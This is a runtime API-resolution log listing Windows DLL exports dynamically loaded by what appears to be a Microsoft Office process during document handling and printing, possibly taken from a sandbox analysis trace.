DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoFDoSmartTagSecurityCheck@8
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: msproof7.dll/DllGetClassObject
DynamicLoader: msproof7.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: USERENV.dll/CreateEnvironmentBlock
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: USERENV.dll/DestroyEnvironmentBlock
DynamicLoader: kernel32.dll/GetNamedPipeClientProcessId
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SHELL32.DLL/SHFileOperationW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: kernel32.dll/GetNamedPipeClientProcessId
DynamicLoader: Comctl32.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetNamedPipeClientProcessId
DynamicLoader: kernel32.dll/GetNamedPipeClientProcessId
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: MSGR3EN.DLL/CheckVersion
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptFreeCache
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VBE7.DLL/DllVbeTerm
DynamicLoader: VBE7.DLL/DllCanUnloadNow
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: USER32.dll/UnregisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: mso.dll/
DynamicLoader: DwmApi.DLL/DwmIsCompositionEnabled
DynamicLoader: DwmApi.DLL/DwmGetColorizationColor
DynamicLoader: kernel32.dll/GetProductInfo
DynamicLoader: kernel32.dll/GetUserGeoID
DynamicLoader: msi.dll/DllGetVersion
DynamicLoader: GdiPlus.dll/GdipDeleteCachedBitmap
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverPackagePathW
DynamicLoader: WINSPOOL.DRV/CorePrinterDriverInstalledW
DynamicLoader: WINSPOOL.DRV/GetCorePrinterDriversW
DynamicLoader: WINSPOOL.DRV/UploadPrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/InstallPrinterDriverFromPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/AddPrinterConnection2W
DynamicLoader: WINSPOOL.DRV/OpenPrinter2W
DynamicLoader: WINSPOOL.DRV/DeletePrinterKeyW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataExW
DynamicLoader: WINSPOOL.DRV/EnumPrinterKeyW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataExW
DynamicLoader: WINSPOOL.DRV/GetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataW
DynamicLoader: WINSPOOL.DRV/SpoolerPrinterEvent
DynamicLoader: WINSPOOL.DRV/SetPortW
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: WINSPOOL.DRV/DevicePropertySheets
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeA
DynamicLoader: WINSPOOL.DRV/AddPortExW
DynamicLoader: WINSPOOL.DRV/DeletePrintProvidorW
DynamicLoader: WINSPOOL.DRV/AddPrintProvidorW
DynamicLoader: WINSPOOL.DRV/DeletePrintProcessorW
DynamicLoader: WINSPOOL.DRV/DeleteMonitorW
DynamicLoader: WINSPOOL.DRV/AddMonitorW
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesA
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/DeviceCapabilitiesW
DynamicLoader: WINSPOOL.DRV/DeletePrinterIC
DynamicLoader: WINSPOOL.DRV/PlayGdiScriptOnPrinterIC
DynamicLoader: WINSPOOL.DRV/CreatePrinterIC
DynamicLoader: WINSPOOL.DRV/SetJobW
DynamicLoader: WINSPOOL.DRV/GetJobW
DynamicLoader: WINSPOOL.DRV/EnumJobsW
DynamicLoader: WINSPOOL.DRV/AddPrinterW
DynamicLoader: WINSPOOL.DRV/SetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintersW
DynamicLoader: WINSPOOL.DRV/AddPrinterConnectionW
DynamicLoader: WINSPOOL.DRV/DeletePrinterConnectionW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExA
DynamicLoader: WINSPOOL.DRV/EnumPrinterDriversW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrintProcessorW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorsW
DynamicLoader: WINSPOOL.DRV/GetPrintProcessorDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorDatatypesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/OpenPrinterA
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/FlushPrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterDataW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataW
DynamicLoader: WINSPOOL.DRV/AddJobW
DynamicLoader: WINSPOOL.DRV/ScheduleJob
DynamicLoader: WINSPOOL.DRV/WaitForPrinterChange
DynamicLoader: WINSPOOL.DRV/FindNextPrinterChangeNotification
DynamicLoader: WINSPOOL.DRV/PrinterMessageBoxW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/AddFormW
DynamicLoader: WINSPOOL.DRV/DeleteFormW
DynamicLoader: WINSPOOL.DRV/GetFormW
DynamicLoader: WINSPOOL.DRV/SetFormW
DynamicLoader: WINSPOOL.DRV/EnumFormsW
DynamicLoader: WINSPOOL.DRV/EnumPortsW
DynamicLoader: WINSPOOL.DRV/EnumMonitorsW
DynamicLoader: WINSPOOL.DRV/AddPortW
DynamicLoader: WINSPOOL.DRV/ConfigurePortW
DynamicLoader: WINSPOOL.DRV/DeletePortW
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: GDI32.dll/GdiPrinterThunk
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: secur32.dll/InitSecurityInterfaceW
DynamicLoader: cryptsp.dll/SystemFunction035
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: unidrvui.dll/DrvResetConfigCache
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/EndDocPrinter
DynamicLoader: WINSPOOL.DRV/EndPagePrinter
DynamicLoader: WINSPOOL.DRV/ReadPrinter
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/StartPagePrinter
DynamicLoader: WINSPOOL.DRV/AbortPrinter
DynamicLoader: WINSPOOL.DRV/DocumentEvent
DynamicLoader: WINSPOOL.DRV/QuerySpoolMode
DynamicLoader: WINSPOOL.DRV/QueryRemoteFonts
DynamicLoader: WINSPOOL.DRV/SeekPrinter
DynamicLoader: WINSPOOL.DRV/QueryColorProfile
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/GetSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/CommitSpoolData
DynamicLoader: WINSPOOL.DRV/CloseSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: mxdwdrv.dll/DrvEnableDriver
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
